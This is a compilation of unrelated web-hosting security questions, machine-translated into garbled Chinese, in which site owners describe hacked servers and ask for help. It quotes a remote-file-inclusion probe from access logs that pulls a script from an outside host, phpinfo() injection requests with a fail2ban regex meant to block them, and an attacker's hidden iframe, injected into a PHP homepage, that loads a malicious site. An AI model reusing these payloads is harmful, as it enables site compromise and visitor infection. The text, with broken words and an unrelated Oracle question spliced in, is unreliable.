自从几个星期以来,我的主机上的网站在请求时被一个虚拟主机停放页面劫持。 有时它会显示我的实际网站,但在请求后几分钟,当我重新访问我的网站时,显示停放页面(来自parkingcrew.net)。 我和我的主机已经检查了我的域名服务器和DNS设置,并确保它们都设置正确。 我也检查了我的.htaccess文件,只要我的网站有它,我检查了我的PHP页面,但我似乎无法find他们的任何错误。 我也检查了不同的networking(地点),以确保它不是我的家庭networking的错误。 也许有人可以检查出来,看看是什么问题,或者之前可能有这个问题。 其中两个网站是: http : //serifd.nl和http://turnbroekjemetnaam.nl 。 他们(应该是)运行的IP地址是91.220.37.56。
所以我最近浏览了我的网站访问日志,并注意到有几个尝试做这样的事情 ?page=pics//?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr//skin_shop/…/cms/idf.txt?? 当然,我并不是完全愚蠢的,这对我的服务器或者软件没有任何影响,但是我认为它是这样的,我会看到那个域名上的实际情况。 当它加载时,Chrome试图根据Comodo更改registry项。 有没有什么办法可以从浏览器运行的代码中真正改变一个registry键值,或者是我第一次看到Chrome试图更改一个registry键值。 编辑:4次尝试修改HKLM / SYSTEM / ControlSet001 / Services / ESENT中的不同键
这涉及到我们必须处理的一个黑客事件。 黑客将一个php文件插入到我们的系统中。 有问题的目录确实从我们的cmsadmin接收上传(图片)。 但是,通过我们的cmsadmin上传的所有文件具有相同的所有者和权限( owner: theadminsname, permissions: 777 )。 另一方面,非法插入的文件拥有owner: apache, permissions: 644 我的问题:所有者和权限的这种差异是否提供了有关如何插入文件的任何线索? 如果他们已经通过我们的cmsadmin上传了文件,是不是和其他上传的文件拥有相同的所有者和权限? 所有者是apache的事实是否表明了一个不同的路线,或者他们是否只是将它改变为这个,因为这是一个常见的apache所有者的名字? 另一件事。 插入的文件被放置在我们的自定义cms的一部分。 然后,它为黑客提供了一个表格,用于更改第三方广告程序中的文件(等等)。 看起来很奇怪,他们会上传一个文件到我们自定义的cmsadmin(位于与广告系统完全不同的目录结构中,并且两者之间没有互操作性),然后用它来操作这个第三方广告程序。 cmsadmin和广告程序pipe理员处于不同的目录中,并且不以任何方式以编程方式连接。 这一切都让我怀疑,攻击不是通过我们的cmsadmin或广告系统的弱点进行的,而是通过虚拟主机的弱点进行的。 你们都在想什么?
当我尝试从Windows卸载Oracle 11g时,出现以下错误消息: 检查交换空间:0 MB可用,需要500 MB。 我怎样才能解决这个问题,完全卸载Oracle 11g?
我在应用程序事件日志中注意到一些错误: Exception message: A potentially dangerous Request.QueryString value was detected from the client (term="DTİNST32") Request URL: http://domain.com/url.aspx?term=DTNT AUTHORITY\NETWORK SERVICE%233043/6/2010 6:41:33 PMBNST32 这种请求试图做什么?
我正在为fail2ban写一套规则,让任何试图强行进入我的系统的人都变得更有趣。 绝大多数尝试都倾向于通过我的web服务器进入phpinfo(),如下所示 GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1 GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1 GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1 GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1 我想知道是否有一个用户试图通过Apache访问phpinfo()的任何有效的理由,因为如果不是,我可以简单地使用,或更具体的正则expression式 GET //[^>]+=phpinfo\(\) 作为消除这些攻击的filter
我有一个EC2实例可能已经被入侵。 上个星期的实例响应速度太慢了,最近我已经检查了httpd的访问日志,他们超过了11Gig,尽pipe上个月才打开EC2实例。 今天的access_log正在增长。 日志文件充满了与我正在工作的网站无关的网站。 less数人有ssh访问,但我已经撤销它。 不过,日志文件还在增长。 最后从亚马逊收到一些关于“滥用”的电子邮件,发现邮件活动有所跳跃。 奇怪的是,我从来没有在这个实例上设置邮件服务,但是防火墙已经设置为允许smtp访问(除其他外),即使我只设置了端口80访问和一些端口22。 我不是一个真正的服务器人,我不知道。 我已经更改了我的亚马逊密码并创build了新的访问代码。 将ssh的端口更改为不同的端口。 我真的很感激在这个问题上的任何build议。 谢谢。 // ******** *编辑********* / 我现在认为这是我的服务器用作代理的结果。 根据这些准则http://wiki.apache.org/httpd/ProxyAbuse我已经设法阻止大量的虚假stream量去网站,虽然请求仍然堆积access_logs。 我已经通过尝试使用我的服务器作为代理进行了确认,并强制用户直接访问该网站 – 我想它应该 – 而不是说,yahoo.com。 我不知道这是否是解决scheme,但到目前为止似乎正在解决 – 迄今为止。 不过,贴出来的答案已经让我睁大了眼睛。 如果有人有更多的话,我很乐意听到。 非常感谢!
我的网站主机通知我,他们从美国银行得到一个投诉,说我的经销商(WHM)帐户下的一个帐户被一名networking钓鱼者入侵。 一旦主机取消了我的帐户,我试图找出这个帐户如何被入侵,但无法弄清楚。 我的帐户没有任何脚本运行,只是静态的.html文件。 所有的密码都相当强大 – 8个字符自动生成小写,大写,数字和特殊字符混合。 客户端计算机连接到路由器,并具有最新的防病毒,反间谍软件,防火墙,并没有被感染过。 共享SSL证书的Web主机不支持SFTP,因此正常情况下使用filezilla完成上传 我假设如果钓鱼者以某种方式获取密码,那么他们会做更多的损害,所以我目前的思路是在cpanel / .htaccess等的某种脆弱性? networking钓鱼者制作了一个子网站和一个假冒网站的文件夹,捕获银行信息并通过电子邮件发送给自己。 我的问题是,这个钓鱼者如何让这个账户上传他的文件呢? (或者他可能利用哪些弱点)
我们的ISP提供思科EPC3928AD EuroDocsis 3.0双端口语音网关。 路由器连接到防火墙(运行iptables和Wireshark的Ubuntu-box)。 我们的LAN(10.0.0.1/24)超出了防火墙。 没有其他设备连接到路由器。 路由器的WIFI已被禁用。 几天前,我们发现在获取邮件或浏览时遇到了问题。 连接开始变慢,有时我们根本没有连接。 这种行为似乎随机发生,并在不规则的时间段(约1-30分钟)。 LAN上的所有设备都受到影响。 Skype等特定服务不受影响。 ISP对路由器进行了检查,并与其他WAN进行了连接。 他们没有发现问题,既没有调制解调器本身,也没有信号强度或电缆。 他们还设置了监控调制解调器所在的广域网段,并且运行了几天而没有发现任何问题。 我们的局域网没有DHCP。 我们也在调制解调器中closures了DHCP。 面向广域网的防火墙上的NIC被设置为192.168.0.201。 尽pipe我们的局域网具有静态地址,并且每个网卡上的DNSconfiguration都设置为ISP推荐的DNS,但他们告诉我们在路由器中激活DHCP“有时会有所帮助”。 我们继续激活DHCP,起始地址为192.168.0.201,范围为1.我们还为面向调制解调器的网卡的MAC保留了192.168.0.201。 接下来发生的事情让我们感到困惑:在路由器的“预分配的DHCP IP地址”中,列出了一个未知的MAC地址:00:11:e6:de:ad:07(00:11:e6属于Cisco的一部分) 192.168.0.201。 而且,在路由器的“连接设备摘要”中,出现了相同的MAC,但是这次在局域网上有一个IP(10.0.0.74)! 我们重新启动了路由器,但无济于事。 同一个未知的MAC再次出现,这次局域网上的工作站已经在使用局域网地址(10.0.0.2)。 阻止IP表中的MAC使得MAC从“连接的设备摘要”中消失,但仍处于“预分配的DHCP IP地址”列表中。 我们已经将IP范围设置为2,所以它现在占用192.168.0.202而不是192.168.0.201。 重新启动路由器或从防火墙断开连接不起作用。 未知的MAC不断重现。 连接的间歇性问题依然存在。 到底是怎么回事? 这是一种黑客攻击吗? 任何input将不胜感激。
可能重复: 我的服务器被黑了应急 有人侵入我们的网站,并在我们的主页(index.php)中放入以下行::在下面的代码中,bottom.php是我们自己的文件,入侵者将"echo <iframe …. >;" 在我们的“include_once”代码之间。 <?include_once('bottom.php'); echo "<iframe src=\"http://clydaib.net/?click=86B26\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; ?> 请帮助我,以防止这种侵入。 PHP版本5.2.9,系统:Linux hansens 2.4.32-grsec-opteron-peon-1.1.1#1 SMP Fri Dec 21 15:45:17 PST 2007 i686